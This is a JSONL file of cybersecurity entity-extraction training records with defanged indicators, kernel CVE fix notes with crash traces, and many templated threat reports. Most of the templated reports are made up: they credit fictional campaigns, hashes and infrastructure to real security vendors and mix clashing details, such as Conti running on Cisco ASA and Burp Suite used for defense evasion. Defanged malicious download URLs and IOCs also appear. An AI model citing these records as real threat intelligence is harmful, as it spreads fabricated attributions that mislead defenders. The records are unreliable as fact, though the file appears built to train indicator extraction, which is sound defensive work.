{"text": "A ZIP archive recovered during our investigations , schtasks[.]zip , contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ ProgramDataUpdater . ’ The malicious installation version has a task name and description in English , and the clean uninstall version has a task name and description in Cyrillic .", "spans": {"Indicator: schtasks.zip": [[52, 66]], "Malware: CATRUNNER": [[111, 120]]}, "info": {"id": "cyberner_stix_train_005973", "source": "defanged_augment"}}
{"text": "Urgent_Information_Report[.]exe :", "spans": {"Indicator: Urgent_Information_Report.exe": [[0, 31]]}, "info": {"id": "cyberner_stix_train_000696", "source": "defanged_augment"}}
{"text": "id= $ NUM ” . The registrant information for kernel[ . ]ws also provided a geolocation of Tehran , IR and the email provider for the address used in checkgoogle[.]org was the same used for mydomain1607[.]com , chmail.ir . Gamaredon : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . But what happens when an unidentified virus infects a victims computer Antivirus programs can only protect against threats they already know .", "spans": {"Organization: email provider": [[110, 124]], "Indicator: c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f": [[234, 298]], "Malware: unidentified virus": [[326, 344]], "Organization: Antivirus programs": [[372, 390]], "Indicator: kernel.ws": [[45, 58]], "Indicator: checkgoogle.org": [[149, 166]], "Indicator: mydomain1607.com": [[189, 207]]}, "info": {"id": "cyberner_stix_train_007908", "source": "defanged_augment"}}
{"text": "As a rule , bots self-proliferate by sending out text messages with a malicious link to addresses in the victim ’ s address book . the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) . When the malicious DLL is loaded at hpqhvind[.]exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA . It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": {"Indicator: hpqhvind.exe": [[262, 276]]}, "info": {"id": "cyberner_stix_train_001835", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/mlx5: Fix a WARN during dereg_mr for DM type\n\nMemory regions (MR) of type DM (device memory) do not have an associated\numem.\n\nIn the __mlx5_ib_dereg_mr() -> mlx5_free_priv_descs() flow, the code\nincorrectly takes the wrong branch, attempting to call\ndma_unmap_single() on a DMA address that is not mapped.\n\nThis results in a WARN [1], as shown below.\n\nThe issue is resolved by properly accounting for the DM type and\nensuring the correct branch is selected in mlx5_free_priv_descs().\n\n[1]\nWARNING: CPU: 12 PID: 1346 at drivers/iommu/dma-iommu.c:1230 iommu_dma_unmap_page+0x79/0x90\nModules linked in: ip6table_mangle ip6table_nat ip6table_filter ip6_tables iptable_mangle xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter rpcsec_gss_krb5 auth_rpcgss oid_registry ovelay rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm mlx5_ib ib_uverbs ib_core fuse mlx5_core\nCPU: 12 UID: 0 PID: 1346 Comm: ibv_rc_pingpong Not tainted 6.12.0-rc7+ #1631\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]13[.]0-0-gf21b5a4aeb02-prebuilt[.]qemu[.]org 04/01/2014\nRIP: 0010:iommu_dma_unmap_page+0x79/0x90\nCode: 2b 49 3b 29 72 26 49 3b 69 08 73 20 4d 89 f0 44 89 e9 4c 89 e2 48 89 ee 48 89 df 5b 5d 41 5c 41 5d 41 5e 41 5f e9 07 b8 88 ff <0f> 0b 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc 66 0f 1f 44 00\nRSP: 0018:ffffc90001913a10 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff88810194b0a8 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001\nRBP: ffff88810194b0a8 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: 0000000000000000 R12: 0000000000000000\nR13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000000\nFS:  00007f537abdd740(0000) GS:ffff88885fb00000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f537aeb8000 CR3: 000000010c248001 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n<TASK>\n? __warn+0x84/0x190\n? iommu_dma_unmap_page+0x79/0x90\n? report_bug+0xf8/0x1c0\n? handle_bug+0x55/0x90\n? exc_invalid_op+0x13/0x60\n? asm_exc_invalid_op+0x16/0x20\n? iommu_dma_unmap_page+0x79/0x90\ndma_unmap_page_attrs+0xe6/0x290\nmlx5_free_priv_descs+0xb0/0xe0 [mlx5_ib]\n__mlx5_ib_dereg_mr+0x37e/0x520 [mlx5_ib]\n? _raw_spin_unlock_irq+0x24/0x40\n? wait_for_completion+0xfe/0x130\n? rdma_restrack_put+0x63/0xe0 [ib_core]\nib_dereg_mr_user+0x5f/0x120 [ib_core]\n? lock_release+0xc6/0x280\ndestroy_hw_idr_uobject+0x1d/0x60 [ib_uverbs]\nuverbs_destroy_uobject+0x58/0x1d0 [ib_uverbs]\nuobj_destroy+0x3f/0x70 [ib_uverbs]\nib_uverbs_cmd_verbs+0x3e4/0xbb0 [ib_uverbs]\n? __pfx_uverbs_destroy_def_handler+0x10/0x10 [ib_uverbs]\n? lock_acquire+0xc1/0x2f0\n? ib_uverbs_ioctl+0xcb/0x170 [ib_uverbs]\n? ib_uverbs_ioctl+0x116/0x170 [ib_uverbs]\n? lock_release+0xc6/0x280\nib_uverbs_ioctl+0xe7/0x170 [ib_uverbs]\n? ib_uverbs_ioctl+0xcb/0x170 [ib_uverbs]\n__x64_sys_ioctl+0x1b0/0xa70\ndo_syscall_64+0x6b/0x140\nentry_SYSCALL_64_after_hwframe+0x76/0x7e\nRIP: 0033:0x7f537adaf17b\nCode: 0f 1e fa 48 8b 05 1d ad 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ed ac 0c 00 f7 d8 64 89 01 48\nRSP: 002b:00007ffff218f0b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007ffff218f1d8 RCX: 00007f537adaf17b\nRDX: 00007ffff218f1c0 RSI: 00000000c0181b01 RDI: 0000000000000003\nRBP: 00007ffff218f1a0 R08: 00007f537aa8d010 R09: 0000561ee2e4f270\nR10: 00007f537aace3a8 R11: 0000000000000246 R12: 00007ffff218f190\nR13: 000000000000001c R14: 0000561ee2e4d7c0 R15: 00007ffff218f450\n</TASK>", "spans": {"Indicator: rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org": [[1162, 1214]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1120, 1124]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-21888"}}
{"text": "Artifact Analysis for Emotet campaign:\nStage 1 dropper at /usr/local/bin/winlogon.exe - SHA1: c617f5b66b8cb27f811c87cd8cb6d7cf14d49c1d\nStage 2 loader at C:\\ProgramData\\taskhost.exe - SHA1: 36fb2b9f8743d6ab9a4c7a96f5c7007c04bae23d\nFinal payload at /etc/cron.d/shell.php - SHA1: 5c88785e18698adad9f6544de0c8ae80342fccdd\nExfiltration module - MD5: d3b984434da5a85c7d4fe72b130a7802\nAll stages communicated with 172[.]211[.]233[.]1. Hashcat signatures detected in Stage 2.", "spans": {"Malware: Emotet": [[22, 28]], "Indicator: c617f5b66b8cb27f811c87cd8cb6d7cf14d49c1d": [[94, 134]], "Indicator: 36fb2b9f8743d6ab9a4c7a96f5c7007c04bae23d": [[189, 229]], "Indicator: 5c88785e18698adad9f6544de0c8ae80342fccdd": [[277, 317]], "Indicator: d3b984434da5a85c7d4fe72b130a7802": [[345, 377]], "Indicator: 172.211.233.1": [[407, 426]]}, "info": {"id": "synth_v2_01897", "source": "defanged_augment"}}
{"text": "The Cowrie SSH honeypot recorded 118 unique attacker IP addresses over 24 hours on 2026-04-24. Top attackers by connection volume were 222[.]186[.]42[.]137 (4,521 attempts), 218[.]92[.]0[.]56 (3,877 attempts), and 106[.]75[.]85[.]134 (2,103 attempts). Attackers attempted to download payloads from hxxp://185[ . ]196[ . ]8[ . ]124/bins/mirai.arm7 and hxxp://45[ . ]95[ . ]147[ . ]236/ssh_botnet.sh. Common usernames targeted included root, admin, oracle, and postgres. Payloads were identified as Mirai botnet variants.", "spans": {"Indicator: 222.186.42.137": [[135, 155]], "Indicator: 218.92.0.56": [[174, 191]], "Indicator: 106.75.85.134": [[214, 233]], "Indicator: http://185.196.8.124/bins/mirai.arm7": [[298, 346]], "Indicator: http://45.95.147.236/ssh_botnet.sh": [[351, 397]], "Malware: Mirai": [[497, 502]]}, "info": {"id": "otx_00039", "source": "defanged_augment"}}
{"text": "Artifact Analysis for WarmCookie campaign:\nStage 1 dropper at C:\\Users\\admin\\Desktop\\implant.so - MD5: 7c3e542708b6d48c04704591862c8a33\nStage 2 loader at /dev/shm/implant.so - SHA256: aed800f7ed075cd08b9e43acf068c924492fe1bfd60195e7a7e01fc7b5c2ffb2\nFinal payload at /etc/cron.d/update.dll - MD5: c5225fc5dc3cf6ae4dba0157013f0920\nExfiltration module - MD5: 396bede1e1c13c1c1763962f1e74784d\nAll stages communicated with 177[.]203[.]208[.]215. BloodHound signatures detected in Stage 2.", "spans": {"Malware: WarmCookie": [[22, 32]], "Indicator: 7c3e542708b6d48c04704591862c8a33": [[103, 135]], "Indicator: aed800f7ed075cd08b9e43acf068c924492fe1bfd60195e7a7e01fc7b5c2ffb2": [[184, 248]], "Indicator: c5225fc5dc3cf6ae4dba0157013f0920": [[296, 328]], "Indicator: 396bede1e1c13c1c1763962f1e74784d": [[356, 388]], "Indicator: 177.203.208.215": [[418, 439]]}, "info": {"id": "synth_v2_01898", "source": "defanged_augment"}}
{"text": "Recorded Future published a threat intelligence report linking Aqua Blizzard to a new campaign exploiting CVE-2020-12082 in SonicWall SMA. The attackers deployed Royal via BITSAdmin, establishing C2 communication with 180 [ . ] 32 [ . ] 30 [ . ] 240 and login-gateway[.]tech. A secondary payload was downloaded from hxxps://relayportal[.]site/admin/config. The malware binary (SHA1: 26686e9771ce132aa0f5c6f08149413040d4839c) was dropped to C:\\Windows\\System32\\csrss.exe. Phishing emails were sent from alert@account-update[.]xyz targeting enterprise users. A backup C2 server was identified at 172[.]16[.]146[.]105.", "spans": {"Organization: Recorded Future": [[0, 15]], "Vulnerability: CVE-2020-12082": [[106, 120]], "System: SonicWall SMA": [[124, 137]], "Malware: Royal": [[162, 167]], "Indicator: 180.32.30.240": [[218, 249]], "Indicator: login-gateway.tech": [[254, 274]], "Indicator: hxxps://relayportal.site/admin/config": [[316, 355]], "Indicator: 26686e9771ce132aa0f5c6f08149413040d4839c": [[383, 423]], "Indicator: alert@account-update.xyz": [[502, 528]], "Indicator: 172.16.146.105": [[594, 614]]}, "info": {"id": "synth_v2_00075", "source": "defanged_augment"}}
{"text": "Blog Post by Trend Micro: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-43392 against Juniper SRX deployments. The initial access vector involves spear-phishing emails from admin@identity-verify[ . ]cc delivering QakBot. Post-compromise, the attackers deploy NjRAT and use Mimikatz for reconnaissance. C2 infrastructure includes 158[.]10[.]77[.]62 and cdn-static[.]link. A staging server at hxxps://gatewaysecure[ . ]net/assets/js/payload.js hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\lsass.dmp (MD5: 0e3aa6691ef076ee77a8deb95b559e6e).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2025-43392": [[128, 142]], "System: Juniper SRX": [[151, 162]], "Indicator: admin@identity-verify.cc": [[238, 266]], "Malware: QakBot": [[278, 284]], "Malware: NjRAT": [[324, 329]], "Indicator: 158.10.77.62": [[394, 412]], "Indicator: cdn-static.link": [[417, 434]], "Indicator: https://gatewaysecure.net/assets/js/payload.js": [[456, 506]], "Indicator: 0e3aa6691ef076ee77a8deb95b559e6e": [[589, 621]]}, "info": {"id": "synth_v2_01690", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: core: Fix refcount error in del_mtd_device()\n\ndel_mtd_device() will call of_node_put() to mtd_get_of_node(mtd), which\nis mtd->dev.of_node. However, memset(&mtd->dev, 0) is called before\nof_node_put(). As the result, of_node_put() won't do anything in\ndel_mtd_device(), and causes the refcount leak.\n\ndel_mtd_device()\n    memset(&mtd->dev, 0, sizeof(mtd->dev) # clear mtd->dev\n    of_node_put()\n        mtd_get_of_node(mtd) # mtd->dev is cleared, can't locate of_node\n                             # of_node_put(NULL) won't do anything\n\nFix the error by caching the pointer of the device_node.\n\nOF: ERROR: memory leak, expected refcount 1 instead of 2,\nof_node_get()/of_node_put() unbalanced - destroy cset entry: attach\noverlay node /spi/spi-sram@0\nCPU: 3 PID: 275 Comm: python3 Tainted: G N 6.1.0-rc3+ #54\n    0d8a1edddf51f172ff5226989a7565c6313b08e2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nrel-1[.]15[.]0-0-g2dd4b9b3f840-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n<TASK>\n    dump_stack_lvl+0x67/0x83\n    kobject_get+0x155/0x160\n    of_node_get+0x1f/0x30\n    of_fwnode_get+0x43/0x70\n    fwnode_handle_get+0x54/0x80\n    fwnode_get_nth_parent+0xc9/0xe0\n    fwnode_full_name_string+0x3f/0xa0\n    device_node_string+0x30f/0x750\n    pointer+0x598/0x7a0\n    vsnprintf+0x62d/0x9b0\n    ...\n    cfs_overlay_release+0x30/0x90\n    config_item_release+0xbe/0x1a0\n    config_item_put+0x5e/0x80\n    configfs_rmdir+0x3bd/0x540\n    vfs_rmdir+0x18c/0x320\n    do_rmdir+0x198/0x330\n    __x64_sys_rmdir+0x2c/0x40\n    do_syscall_64+0x37/0x90\n    entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[<miquel.raynal@bootlin[.]com>: Light reword of the commit log]", "spans": {"Indicator: rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org": [[985, 1037]], "Indicator: bootlin.com": [[1679, 1692]], "Indicator: 0d8a1edddf51f172ff5226989a7565c6313b08e2": [[884, 924]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[940, 944]], "Vulnerability: memory leak": [[678, 689]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50457"}}
{"text": "A backdoor also known as: TROJ_DROPPER.FK Win32.Trojan.WisdomEyes.16070401.9500.9995 Infostealer.Gampass TROJ_DROPPER.FK Trojan.Win32.XDR.euxmtw Trojan.MulDrop.18385 BehavesLike[ . ]Win32[ . ]Virut[ . ]cc Win32.Infect.a.124448 Win32/Trojan.5f3", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.cc": [[166, 204]]}, "info": {"id": "cyner2_train_000020", "source": "defanged_augment"}}
{"text": "Symantec detected a multi-stage attack chain. The initial phishing email from contact@document-share[.]link contained a link to hxxp://updatenode[.]site/wp-content/uploads/doc.php. This redirected to hxxps://cache-static[ . ]top/login on storage-cdn[ . ]top. A secondary email from security@auth-check[ . ]org pointed to hxxp://portalportal[.]top/callback which delivered RedLine Stealer. The final payload callback was hxxps://storage-mail[ . ]com/admin/config resolving to 192 [ . ] 18 [ . ] 179 [ . ] 252 via edge-cloud[.]com.", "spans": {"Organization: Symantec": [[0, 8]], "Indicator: contact@document-share.link": [[78, 107]], "Indicator: hxxp://updatenode.site/wp-content/uploads/doc.php": [[128, 179]], "Indicator: https://cache-static.top/login": [[200, 234]], "Indicator: storage-cdn.top": [[238, 257]], "Indicator: security@auth-check.org": [[282, 309]], "Indicator: http://portalportal.top/callback": [[321, 355]], "Malware: RedLine Stealer": [[372, 387]], "Indicator: hxxps://storage-mail.com/admin/config": [[420, 461]], "Indicator: 192.18.179.252": [[475, 507]], "Indicator: edge-cloud.com": [[512, 528]]}, "info": {"id": "synth_v2_01798", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Google TAG identified a large-scale phishing operation. Emails originated from finance@phishing-domain[ . ]com and info@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxps://storage-cloud[.]tech/callback which hosted a credential harvesting page on mailstorage[ . ]org. A secondary link hxxp://secureportal[ . ]net/panel/index.html delivered RemcosRAT (SHA1: 6bae7eabf5d21713d633433fb38ce2cb2ba4fee2). The malware was saved to /dev/shm/agent.py and established C2 with 10 [ . ] 71 [ . ] 186 [ . ] 73.", "spans": {"Organization: Google TAG": [[26, 36]], "Indicator: finance@phishing-domain.com": [[105, 136]], "Indicator: info@login-portal.tech": [[141, 165]], "Indicator: hxxps://storage-cloud.tech/callback": [[222, 259]], "Indicator: mailstorage.org": [[305, 324]], "Indicator: http://secureportal.net/panel/index.html": [[343, 387]], "Malware: RemcosRAT": [[398, 407]], "Indicator: 6bae7eabf5d21713d633433fb38ce2cb2ba4fee2": [[415, 455]], "Indicator: 10.71.186.73": [[525, 555]]}, "info": {"id": "synth_v2_01055", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Conti (MD5: ffdf6f86b266dd6b6fec4ad734668304). Upon execution on Cisco ASA, the sample creates C:\\Windows\\Temp\\dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 73[.]220[.]123[.]60 every 60 seconds and DNS queries to static-static[.]cc. The second stage was fetched from hxxp://edgemail[.]live/download/update.exe and written to /opt/app/bin/helper.sh. The payload uses Rubeus-style techniques for defense evasion. A secondary hash (SHA1: 01fbcd6ca63acb13312ca7a9b3d4741abe84a84c) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: ffdf6f86b266dd6b6fec4ad734668304": [[37, 69]], "System: Cisco ASA": [[90, 99]], "Indicator: 73.220.123.60": [[223, 242]], "Indicator: static-static.cc": [[279, 297]], "Indicator: hxxp://edgemail.live/download/update.exe": [[333, 375]], "Indicator: 01fbcd6ca63acb13312ca7a9b3d4741abe84a84c": [[501, 541]]}, "info": {"id": "synth_v2_00591", "source": "defanged_augment"}}
{"text": "Recorded Future published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2023-28217 in Ivanti Connect Secure. The attackers deployed AgentTesla via Mythic, establishing C2 communication with 41 [ . ] 224 [ . ] 154 [ . ] 157 and sync-auth[ . ]dev. A secondary payload was downloaded from hxxps://edge-login[ . ]info/collect. The malware binary (SHA256: 78f706009e82940aadb53106035b179b28fe918c2b1d8580ca768e3e8da9e64d) was dropped to /opt/app/bin/runtime.dll. Phishing emails were sent from hr@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 192[.]153[.]53[.]241.", "spans": {"Organization: Recorded Future": [[0, 15]], "Vulnerability: CVE-2023-28217": [[106, 120]], "System: Ivanti Connect Secure": [[124, 145]], "Malware: AgentTesla": [[170, 180]], "Indicator: 41.224.154.157": [[228, 260]], "Indicator: sync-auth.dev": [[265, 282]], "Indicator: https://edge-login.info/collect": [[324, 359]], "Indicator: 78f706009e82940aadb53106035b179b28fe918c2b1d8580ca768e3e8da9e64d": [[389, 453]], "Indicator: hr@urgent-notice.online": [[527, 554]], "Indicator: 192.153.53.241": [[620, 640]]}, "info": {"id": "synth_v2_00007", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-20463 is a critical CSRF vulnerability affecting SonicWall SMA. Cisco Talos confirmed active exploitation by MuddyWater in the wild. Exploitation delivers PikaBot (MD5: c24368cbc473c40582f65345f1ae45b3) which is dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\update.dll. The exploit payload is hosted at hxxps://proxysecure[.]club/callback and communicates to 86 [ . ] 41 [ . ] 160 [ . ] 146 for C2.", "spans": {"Vulnerability: CVE-2021-20463": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: SonicWall SMA": [[82, 95]], "Organization: Cisco Talos": [[97, 108]], "Malware: PikaBot": [[188, 195]], "Indicator: c24368cbc473c40582f65345f1ae45b3": [[202, 234]], "Indicator: hxxps://proxysecure.club/callback": [[335, 370]], "Indicator: 86.41.160.146": [[391, 422]]}, "info": {"id": "synth_v2_00806", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: ShadowPad (MD5: 989184ff1c7a6711dbdbf118cf5f8364). Upon execution on F5 BIG-IP, the sample creates /dev/shm/backdoor.elf and injects into legitimate processes. Network analysis shows beaconing to 218 [ . ] 240 [ . ] 132 [ . ] 148 every 60 seconds and DNS queries to storagenode[.]org. The second stage was fetched from hxxps://staticdata[ . ]xyz/callback and written to /opt/app/bin/loader.exe. The payload uses Burp Suite-style techniques for defense evasion. A secondary hash (SHA1: 69f8ba122a086af4b1e15a923b341898ecfeef18) was extracted from the unpacked payload.", "spans": {"Malware: ShadowPad": [[25, 34]], "Indicator: 989184ff1c7a6711dbdbf118cf5f8364": [[41, 73]], "System: F5 BIG-IP": [[94, 103]], "Indicator: 218.240.132.148": [[221, 254]], "Indicator: storagenode.org": [[291, 308]], "Indicator: hxxps://staticdata.xyz/callback": [[344, 379]], "Indicator: 69f8ba122a086af4b1e15a923b341898ecfeef18": [[510, 550]]}, "info": {"id": "synth_v2_00607", "source": "defanged_augment"}}
{"text": "In this case , a URL used to download the PowerShell component shared a naming convention found in the IBM report , hxxp://69[.]87[.]223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples .", "spans": {"Organization: IBM": [[103, 106]], "Indicator: http://69.87.223.26:8080/eiloShaegae1": [[116, 159]]}, "info": {"id": "cyberner_stix_train_005172", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Dridex Campaign:\nNetwork Indicators:\n- 192[.]52[.]228[.]151\n- 128[.]244[.]179[.]1\n- 10 [ . ] 157 [ . ] 170 [ . ] 196\n- login-cdn[ . ]org\n- secureportal[ . ]cc\nURLs:\n- hxxps://login-portal[ . ]top/secure/token\n- hxxp://mail-relay[ . ]xyz/login\nEmail Senders:\n- report@phishing-domain[ . ]com\n- updates@mail-service[ . ]info\nFile Indicators:\n- SHA256: 292fcaf1a11abdc90430629e03a7fd64f0616b9981ee416f53f7e74725db5424\n- SHA256: 645c1b9c7d6964ce89b3536d0be0124095f8a47a7dfafb3c15d3ef11cec9afce\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\lsass.dmp", "spans": {"Malware: Dridex": [[15, 21]], "Indicator: 192.52.228.151": [[54, 74]], "Indicator: 128.244.179.1": [[77, 96]], "Indicator: 10.157.170.196": [[99, 131]], "Indicator: login-cdn.org": [[134, 151]], "Indicator: secureportal.cc": [[154, 173]], "Indicator: https://login-portal.top/secure/token": [[182, 223]], "Indicator: hxxp://mail-relay.xyz/login": [[226, 257]], "Indicator: report@phishing-domain.com": [[275, 305]], "Indicator: updates@mail-service.info": [[308, 337]], "Indicator: 292fcaf1a11abdc90430629e03a7fd64f0616b9981ee416f53f7e74725db5424": [[365, 429]], "Indicator: 645c1b9c7d6964ce89b3536d0be0124095f8a47a7dfafb3c15d3ef11cec9afce": [[440, 504]]}, "info": {"id": "synth_v2_01314", "source": "defanged_augment"}}
{"text": "CVE-2026-35073: Dell PowerProtect Data Domain, versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8[.]7[.]0[.]0, LTS2025 release versions 8[.]3[.]1[.]0 through 8 [ . ] 3 [ . ] 1 [ . ] 20, LTS2024 release versions 7[.]13[.]1[.]0 through 7[.]13[.]1[.]60 contain an improper neutralization of special elements used in an OS command injection vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution with root privileges.", "spans": {"Vulnerability: CVE-2026-35073": [[0, 14]], "Vulnerability: improper neutralization": [[255, 278]], "Vulnerability: command injection": [[313, 330]], "Vulnerability: arbitrary command": [[448, 465]], "Indicator: 7.7.1.0": [[56, 81]], "Indicator: 8.7.0.0": [[90, 103]], "Indicator: 8.3.1.0": [[130, 143]], "Indicator: 8.3.1.20": [[152, 178]], "Indicator: 7.13.1.0": [[205, 219]], "Indicator: 7.13.1.60": [[228, 243]]}, "info": {"id": "nvd_2026_35073", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. Emails originated from info@urgent-notice[ . ]online and hr@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxp://auth-cache[ . ]org/login which hosted a credential harvesting page on static-proxy[ . ]xyz. A secondary link hxxp://gatewayproxy[.]xyz/wp-content/uploads/doc.php delivered BlackCat (SHA1: 15529b78ea3a38033423a8fd154dbd12f25aed91). The malware was saved to C:\\Users\\admin\\Desktop\\agent.py and established C2 with 11[.]95[.]68[.]83.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: info@urgent-notice.online": [[106, 135]], "Indicator: hr@login-portal.tech": [[140, 162]], "Indicator: hxxp://auth-cache.org/login": [[219, 250]], "Indicator: static-proxy.xyz": [[296, 316]], "Indicator: hxxp://gatewayproxy.xyz/wp-content/uploads/doc.php": [[335, 387]], "Malware: BlackCat": [[398, 406]], "Indicator: 15529b78ea3a38033423a8fd154dbd12f25aed91": [[414, 454]], "Indicator: 11.95.68.83": [[538, 555]]}, "info": {"id": "synth_v2_01000", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-49565 is a critical CSRF vulnerability affecting Fortinet FortiGate. CISA confirmed active exploitation by Gamaredon in the wild. Exploitation delivers Latrodectus (MD5: 14002449b55a0787c563a3b413454423) which is dropped to /opt/app/bin/implant.so. The exploit payload is hosted at hxxps://api-storage[.]cc/panel/index.html and communicates to 173[.]105[.]218[.]77 for C2.", "spans": {"Vulnerability: CVE-2022-49565": [[24, 38]], "Vulnerability: CSRF vulnerability": [[53, 71]], "System: Fortinet FortiGate": [[82, 100]], "Organization: CISA": [[102, 106]], "Malware: Latrodectus": [[185, 196]], "Indicator: 14002449b55a0787c563a3b413454423": [[203, 235]], "Indicator: https://api-storage.cc/panel/index.html": [[315, 356]], "Indicator: 173.105.218.77": [[377, 397]]}, "info": {"id": "synth_v2_00848", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Vidar (SHA256: 50df7eaf6c17024c396639b4e074d33807f8fa16b3be489a06c5e69bb1003340). Upon execution on Atlassian Confluence, the sample creates /etc/cron.d/ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 206[.]131[.]54[.]211 every 60 seconds and DNS queries to edge-data[ . ]live. The second stage was fetched from hxxp://data-relay[.]dev/api/v2/auth and written to C:\\Users\\admin\\Desktop\\ntds.dit. The payload uses BITSAdmin-style techniques for defense evasion. A secondary hash (SHA1: 6e9f28b1a35307e2abefd6b75fb15d4dc1882d74) was extracted from the unpacked payload.", "spans": {"Malware: Vidar": [[25, 30]], "Indicator: 50df7eaf6c17024c396639b4e074d33807f8fa16b3be489a06c5e69bb1003340": [[40, 104]], "System: Atlassian Confluence": [[125, 145]], "Indicator: 206.131.54.211": [[262, 282]], "Indicator: edge-data.live": [[319, 337]], "Indicator: hxxp://data-relay.dev/api/v2/auth": [[373, 408]], "Indicator: 6e9f28b1a35307e2abefd6b75fb15d4dc1882d74": [[546, 586]]}, "info": {"id": "synth_v2_00608", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nproc: fix UAF in proc_get_inode()\n\nFix race between rmmod and /proc/XXX's inode instantiation.\n\nThe bug is that pde->proc_ops don't belong to /proc, it belongs to a\nmodule, therefore dereferencing it after /proc entry has been registered\nis a bug unless use_pde/unuse_pde() pair has been used.\n\nuse_pde/unuse_pde can be avoided (2 atomic ops!) because pde->proc_ops\nnever changes so information necessary for inode instantiation can be\nsaved _before_ proc_register() in PDE itself and used later, avoiding\npde->proc_ops->...  dereference.\n\n      rmmod                         lookup\nsys_delete_module\n                         proc_lookup_de\n\t\t\t   pde_get(de);\n\t\t\t   proc_get_inode(dir->i_sb, de);\n  mod->exit()\n    proc_remove\n      remove_proc_subtree\n       proc_entry_rundown(de);\n  free_module(mod);\n\n                               if (S_ISREG(inode->i_mode))\n\t                         if (de->proc_ops->proc_read_iter)\n                           --> As module is already freed, will trigger UAF\n\nBUG: unable to handle page fault for address: fffffbfff80a702b\nPGD 817fc4067 P4D 817fc4067 PUD 817fc0067 PMD 102ef4067 PTE 0\nOops: Oops: 0000 [#1] PREEMPT SMP KASAN PTI\nCPU: 26 UID: 0 PID: 2667 Comm: ls Tainted: G\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996)\nRIP: 0010:proc_get_inode+0x302/0x6e0\nRSP: 0018:ffff88811c837998 EFLAGS: 00010a06\nRAX: dffffc0000000000 RBX: ffffffffc0538140 RCX: 0000000000000007\nRDX: 1ffffffff80a702b RSI: 0000000000000001 RDI: ffffffffc0538158\nRBP: ffff8881299a6000 R08: 0000000067bbe1e5 R09: 1ffff11023906f20\nR10: ffffffffb560ca07 R11: ffffffffb2b43a58 R12: ffff888105bb78f0\nR13: ffff888100518048 R14: ffff8881299a6004 R15: 0000000000000001\nFS:  00007f95b9686840(0000) GS:ffff8883af100000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: fffffbfff80a702b CR3: 0000000117dd2000 CR4: 00000000000006f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n <TASK>\n proc_lookup_de+0x11f/0x2e0\n 